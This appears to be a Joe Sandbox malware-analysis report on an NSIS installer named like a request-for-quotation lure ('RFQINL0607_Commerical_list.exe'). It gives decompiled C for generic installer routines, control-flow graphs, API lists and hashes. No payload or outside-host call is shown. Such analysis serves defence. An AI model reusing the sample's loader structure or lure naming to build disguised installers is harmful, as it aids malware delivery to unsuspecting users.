                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                  • String ID: "C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                  • API String ID: 2035342205-1321873675
                                                                                                                                                                                  • Opcode ID: cdb8aefc9fe16c2bd657ea7c6e789123124ab323f23aa8a60f3b89bc8f6aca59
                                                                                                                                                                                  • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                                                                                                                                                  • Opcode Fuzzy Hash: cdb8aefc9fe16c2bd657ea7c6e789123124ab323f23aa8a60f3b89bc8f6aca59
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00406033 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00406033(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42b0b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42b0b8;
			}




                                                                                                                                                                                  0x0040603e
                                                                                                                                                                                  0x00406047
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406054
                                                                                                                                                                                  0x0040604a
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindFirstFileA.KERNELBASE(762C3410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,762C3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,762C3410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040604A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                  • Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                                                                                                                  • Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004036AF Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 282 4036af-4036c7 call 4060c8 285 4036c9-4036d9 call 405c8d 282->285 286 4036db-40370c call 405c16 282->286 294 40372f-403758 call 403974 call 40588f 285->294 290 403724-40372a lstrcatA 286->290 291 40370e-40371f call 405c16 286->291 290->294 291->290 300 40375e-403763 294->300 301 4037df-4037e7 call 40588f 294->301 300->301 302 403765-403789 call 405c16 300->302 307 4037f5-40381a LoadImageA 301->307 308 4037e9-4037f0 call 405d51 301->308 302->301 311 40378b-40378d 302->311 309 40389b-4038a3 call 40140b 307->309 310 40381c-40384c RegisterClassA 307->310 308->307 324 4038a5-4038a8 309->324 325 4038ad-4038b8 call 403974 309->325 313 403852-403896 SystemParametersInfoA CreateWindowExA 310->313 314 40396a 310->314 316 40379e-4037aa lstrlenA 311->316 317 40378f-40379c call 4057cc 311->317 313->309 322 40396c-403973 314->322 318 4037d2-4037da call 4057a1 call 405d2f 316->318 319 4037ac-4037ba lstrcmpiA 316->319 317->316 318->301 319->318 323 4037bc-4037c6 GetFileAttributesA 319->323 328 4037c8-4037ca 323->328 329 4037cc-4037cd call 4057e8 323->329 324->322 335 403941-403942 call 40501a 325->335 336 4038be-4038d8 ShowWindow call 40605a 325->336 328->318 328->329 329->318 339 403947-403949 335->339 343 4038e4-4038f6 GetClassInfoA 336->343 344 4038da-4038df call 40605a 336->344 341 403963-403965 call 40140b 339->341 342 40394b-403951 339->342 341->314 342->324 345 403957-40395e call 40140b 342->345 348 4038f8-403908 GetClassInfoA RegisterClassA 343->348 349 40390e-403931 DialogBoxParamA call 40140b 343->349 344->343 345->324 348->349 352 403936-40393f call 4035ff 349->352 352->322
                                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                                  			E004036AF(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42e410;
				_t17 = E004060C8(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x429868;
					"1033" = 0x30;
					 *0x435001 = 0x78;
					 *0x435002 = 0;
					E00405C16(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429868, 0);
					__eflags =  *0x429868; // 0x42
					if(__eflags == 0) {
						E00405C16(0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040735A, 0x429868, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E00405C8D("1033",  *_t17() & 0x0000ffff);
				}
				E00403974(_t71, _t84);
				_t80 = "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\sjoske\\Humlebier\\aesc";
				 *0x42e480 =  *0x42e418 & 0x00000020;
				 *0x42e49c = 0x10000;
				if(E0040588F(_t84, "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\sjoske\\Humlebier\\aesc") != 0) {
					L16:
					if(E0040588F(_t92, _t80) == 0) {
						E00405D51(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
					}
					_t25 = LoadImageA( *0x42e400, 0x67, "true", 0, 0, 0x8040); // executed
					 *0x42dbe8 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403974(_t71, __eflags);
							__eflags =  *0x42e4a0;
							if( *0x42e4a0 != 0) {
								_t28 = E0040501A(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B("true");
									goto L33;
								}
								__eflags =  *0x42dbcc; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x429848, 5); // executed
							_t34 = E0040605A("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E0040605A("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42dba0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42dba0);
								 *0x42dbc4 = _t81;
								RegisterClassA(0x42dba0);
							}
							_t36 =  *0x42dbe0; // 0x0
							_t39 = DialogBoxParamA( *0x42e400, _t36 + 0x00000069 & 0x0000ffff, 0, E00403A41, 0); // executed
							E004035FF(E0040140B(5), "true");
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42e400;
						 *0x42dba4 = E00401000;
						 *0x42dbb0 =  *0x42e400;
						 *0x42dbb4 = _t25;
						 *0x42dbc4 = 0x4091f4;
						if(RegisterClassA(0x42dba0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x429848 = CreateWindowExA(0x80, 0x4091f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42e400, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42d3a0;
					E00405C16( *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42e438, 0x42d3a0, 0);
					_t57 =  *0x42d3a0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42d3a1;
						 *((char*)(E004057CC(0x42d3a1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00405D2F(_t80, E004057A1(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E004057E8(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                                                                                                                  0x004036b5
                                                                                                                                                                                  0x004036be
                                                                                                                                                                                  0x004036c5
                                                                                                                                                                                  0x004036c7
                                                                                                                                                                                  0x004036db
                                                                                                                                                                                  0x004036ed
                                                                                                                                                                                  0x004036f4
                                                                                                                                                                                  0x004036fb
                                                                                                                                                                                  0x00403701
                                                                                                                                                                                  0x00403706
                                                                                                                                                                                  0x0040370c
                                                                                                                                                                                  0x0040371f
                                                                                                                                                                                  0x0040371f
                                                                                                                                                                                  0x0040372a
                                                                                                                                                                                  0x004036c9
                                                                                                                                                                                  0x004036d4
                                                                                                                                                                                  0x004036d4
                                                                                                                                                                                  0x0040372f
                                                                                                                                                                                  0x00403739
                                                                                                                                                                                  0x00403742
                                                                                                                                                                                  0x00403747
                                                                                                                                                                                  0x00403758
                                                                                                                                                                                  0x004037df
                                                                                                                                                                                  0x004037e7
                                                                                                                                                                                  0x004037f0
                                                                                                                                                                                  0x004037f0
                                                                                                                                                                                  0x00403806
                                                                                                                                                                                  0x0040380c
                                                                                                                                                                                  0x0040381a
                                                                                                                                                                                  0x0040389b
                                                                                                                                                                                  0x004038a3
                                                                                                                                                                                  0x004038ad
                                                                                                                                                                                  0x004038b2
                                                                                                                                                                                  0x004038b8
                                                                                                                                                                                  0x00403942
                                                                                                                                                                                  0x00403947
                                                                                                                                                                                  0x00403949
                                                                                                                                                                                  0x00403965
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403965
                                                                                                                                                                                  0x0040394b
                                                                                                                                                                                  0x00403951
                                                                                                                                                                                  0x00403959
                                                                                                                                                                                  0x00403959
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403951
                                                                                                                                                                                  0x004038c6
                                                                                                                                                                                  0x004038d1
                                                                                                                                                                                  0x004038d6
                                                                                                                                                                                  0x004038d8
                                                                                                                                                                                  0x004038df
                                                                                                                                                                                  0x004038df
                                                                                                                                                                                  0x004038ea
                                                                                                                                                                                  0x004038f2
                                                                                                                                                                                  0x004038f4
                                                                                                                                                                                  0x004038f6
                                                                                                                                                                                  0x004038ff
                                                                                                                                                                                  0x00403902
                                                                                                                                                                                  0x00403908
                                                                                                                                                                                  0x00403908
                                                                                                                                                                                  0x0040390e
                                                                                                                                                                                  0x00403927
                                                                                                                                                                                  0x00403938
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040393d
                                                                                                                                                                                  0x004038a5
                                                                                                                                                                                  0x004038a7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040381c
                                                                                                                                                                                  0x0040381c
                                                                                                                                                                                  0x00403828
                                                                                                                                                                                  0x00403832
                                                                                                                                                                                  0x00403838
                                                                                                                                                                                  0x0040383d
                                                                                                                                                                                  0x0040384c
                                                                                                                                                                                  0x0040396a
                                                                                                                                                                                  0x0040396a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040396a
                                                                                                                                                                                  0x0040385b
                                                                                                                                                                                  0x00403896
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403896
                                                                                                                                                                                  0x0040375e
                                                                                                                                                                                  0x0040375e
                                                                                                                                                                                  0x00403763
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040376d
                                                                                                                                                                                  0x0040377d
                                                                                                                                                                                  0x00403782
                                                                                                                                                                                  0x00403789
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040378d
                                                                                                                                                                                  0x0040378f
                                                                                                                                                                                  0x0040379c
                                                                                                                                                                                  0x0040379c
                                                                                                                                                                                  0x004037a4
                                                                                                                                                                                  0x004037aa
                                                                                                                                                                                  0x004037d2
                                                                                                                                                                                  0x004037da
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004037bc
                                                                                                                                                                                  0x004037bd
                                                                                                                                                                                  0x004037c6
                                                                                                                                                                                  0x004037cc
                                                                                                                                                                                  0x004037cd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004037cd
                                                                                                                                                                                  0x004037c8
                                                                                                                                                                                  0x004037ca
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004037ca
                                                                                                                                                                                  0x004037aa

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                                                                                                    • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                                                                                                  • lstrcatA.KERNEL32(1033,Baptistisk Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Baptistisk Setup: Installing,00000000,00000002,762C3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe",00000000), ref: 0040372A
                                                                                                                                                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc,1033,Baptistisk Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Baptistisk Setup: Installing,00000000,00000002,762C3410), ref: 0040379F
                                                                                                                                                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(Call), ref: 004037BD
                                                                                                                                                                                  • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc), ref: 00403806
                                                                                                                                                                                    • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                                                                                                                                  • RegisterClassA.USER32(0042DBA0), ref: 00403843
                                                                                                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                                                                                                                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
                                                                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                                                                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
                                                                                                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
                                                                                                                                                                                  • RegisterClassA.USER32(0042DBA0), ref: 00403908
                                                                                                                                                                                  • DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                  • String ID: "C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe"$.DEFAULT\Control Panel\International$.exe$1033$Baptistisk Setup: Installing$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                  • API String ID: 1975747703-1367024863
                                                                                                                                                                                  • Opcode ID: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                                                                                                                                                  • Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00402C66 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 356 402c66-402cb4 GetTickCount GetModuleFileNameA call 4059a2 359 402cc0-402cee call 405d2f call 4057e8 call 405d2f GetFileSize 356->359 360 402cb6-402cbb 356->360 368 402cf4 359->368 369 402ddb-402de9 call 402c02 359->369 361 402e98-402e9c 360->361 371 402cf9-402d10 368->371 376 402deb-402dee 369->376 377 402e3e-402e43 369->377 373 402d12 371->373 374 402d14-402d1d call 4030b1 371->374 373->374 381 402d23-402d2a 374->381 382 402e45-402e4d call 402c02 374->382 379 402df0-402e08 call 4030c7 call 4030b1 376->379 380 402e12-402e3c GlobalAlloc call 4030c7 call 402e9f 376->380 377->361 379->377 403 402e0a-402e10 379->403 380->377 407 402e4f-402e60 380->407 385 402da6-402daa 381->385 386 402d2c-402d40 call 40595d 381->386 382->377 390 402db4-402dba 385->390 391 402dac-402db3 call 402c02 385->391 386->390 405 402d42-402d49 386->405 398 402dc9-402dd3 390->398 399 402dbc-402dc6 call 40613d 390->399 391->390 398->371 406 402dd9 398->406 399->398 403->377 403->380 405->390 409 402d4b-402d52 405->409 406->369 410 402e62 407->410 411 402e68-402e6d 407->411 409->390 412 402d54-402d5b 409->412 410->411 413 402e6e-402e74 411->413 412->390 415 402d5d-402d64 412->415 413->413 414 402e76-402e91 SetFilePointer call 40595d 413->414 418 402e96 414->418 415->390 417 402d66-402d86 415->417 417->377 419 402d8c-402d90 417->419 418->361 420 402d92-402d96 419->420 421 402d98-402da0 419->421 420->406 420->421 421->390 422 402da2-402da4 421->422 422->390
                                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                                  			E00402C66(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\Arthur\\Desktop\\RFQINL0607_Commerical_list.exe";
				 *0x42e40c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\Arthur\\Desktop\\RFQINL0607_Commerical_list.exe", 0x400);
				_t89 = E004059A2(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\Arthur\\Desktop";
				E00405D2F("C:\\Users\\Arthur\\Desktop", _t91);
				E00405D2F(0x436000, E004057E8(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x420424 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402C02("true");
					__eflags =  *0x42e414 - _t82;
					if( *0x42e414 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E004030C7( *0x42e414 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E9F(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42e410 = _t94;
							 *0x42e418 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42e41c =  *0x42e41c + 1;
								__eflags =  *0x42e41c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, "true"); // executed
							 *(_t94 + 0x3c) = _t60;
							E0040595D(0x42e420, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030C7( *0x414418);
					_t65 = E004030B1( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42e414) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004030B1(0x420428, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402C02("true");
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42e414;
						if( *0x42e414 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402C02(0);
							}
							goto L20;
						}
						E0040595D( &_v44, 0x420428, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414418; // 0xa9d5e
						 *0x42e4a0 =  *0x42e4a0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42e414 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x409194
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x420424; // 0xa9f62
						if(__eflags < 0) {
							_v12 = E0040613D(_v12, 0x420428, _t90);
						}
						 *0x414418 =  *0x414418 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                                                                                                                                                                                  0x00402c6e
                                                                                                                                                                                  0x00402c71
                                                                                                                                                                                  0x00402c74
                                                                                                                                                                                  0x00402c77
                                                                                                                                                                                  0x00402c7d
                                                                                                                                                                                  0x00402c8e
                                                                                                                                                                                  0x00402c93
                                                                                                                                                                                  0x00402ca6
                                                                                                                                                                                  0x00402cab
                                                                                                                                                                                  0x00402cae
                                                                                                                                                                                  0x00402cb4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402cb6
                                                                                                                                                                                  0x00402cc1
                                                                                                                                                                                  0x00402cc7
                                                                                                                                                                                  0x00402cd8
                                                                                                                                                                                  0x00402cdf
                                                                                                                                                                                  0x00402ce5
                                                                                                                                                                                  0x00402ce7
                                                                                                                                                                                  0x00402cec
                                                                                                                                                                                  0x00402cee
                                                                                                                                                                                  0x00402ddb
                                                                                                                                                                                  0x00402ddd
                                                                                                                                                                                  0x00402de2
                                                                                                                                                                                  0x00402de9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402deb
                                                                                                                                                                                  0x00402dee
                                                                                                                                                                                  0x00402e12
                                                                                                                                                                                  0x00402e17
                                                                                                                                                                                  0x00402e1d
                                                                                                                                                                                  0x00402e28
                                                                                                                                                                                  0x00402e2d
                                                                                                                                                                                  0x00402e30
                                                                                                                                                                                  0x00402e31
                                                                                                                                                                                  0x00402e32
                                                                                                                                                                                  0x00402e34
                                                                                                                                                                                  0x00402e39
                                                                                                                                                                                  0x00402e3c
                                                                                                                                                                                  0x00402e4f
